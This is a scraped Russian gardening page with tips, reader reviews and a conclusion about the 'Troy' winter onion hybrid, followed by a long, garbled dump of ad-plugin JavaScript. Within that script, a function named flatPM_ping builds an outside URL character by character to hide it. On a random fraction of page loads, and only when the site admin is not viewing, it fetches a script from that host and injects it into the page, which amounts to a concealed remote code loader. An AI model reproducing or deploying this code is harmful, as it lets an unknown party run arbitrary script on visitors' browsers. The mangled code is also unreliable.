Советы опытных огородников

Несколько рекомендаций опытных овощеводов:

  1. При посадке под зиму формируют высокие грядки, иначе севок замерзнет.
  2. Тщательно выравнивают борозды на участке: это сказывается на дружности всходов и урожайности.
  3. Посадки мульчируют природными материалами, в крайнем случае — агроволокном. Не используют полиэтиленовую пленку.
  4. В междурядьях выкладывают ветки тысячелистника, полыни или пижмы для защиты посадок от насекомых-вредителей.

Отзывы

Отзывы огородников на форумах подтверждают положительные характеристики гибрида.

Евгений, Курская область: «Трой я сажаю уже 6 лет подряд, гибрид отличный. Покупаю всегда готовый севок и высаживаю его под зиму. Еще ни разу не было такого, чтобы урожай был маленький или испорченный. Пара поврежденных луковиц не в счет. Храню овощи в погребе, до Нового года лежат без проблем».

Анна, Орловская область: «Обычно у меня не складывается с озимым луком: вроде бы и сажаю в середине октября, а он все равно успевает прорасти, а потом замерзает и гибнет. В прошлом году попробовала посадить Трой, и все удалось. Даже не знаю, в чем дело: то ли я со временем угадала, то ли лук сам по себе отличный. В целом все понравилось: урожай был большой при минимальном уходе, вкус у овощей неострый».

Заключение

Трой — озимый гибрид лука, но высаживают его и весной. Культура устойчива к болезням и вредителям, не требует особого ухода, радует стабильно высокими урожаями и подходит для культивации практически во всех регионах России. Лежкость до пяти месяцев и полуострый вкус луковиц делают их универсальными в кулинарии.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};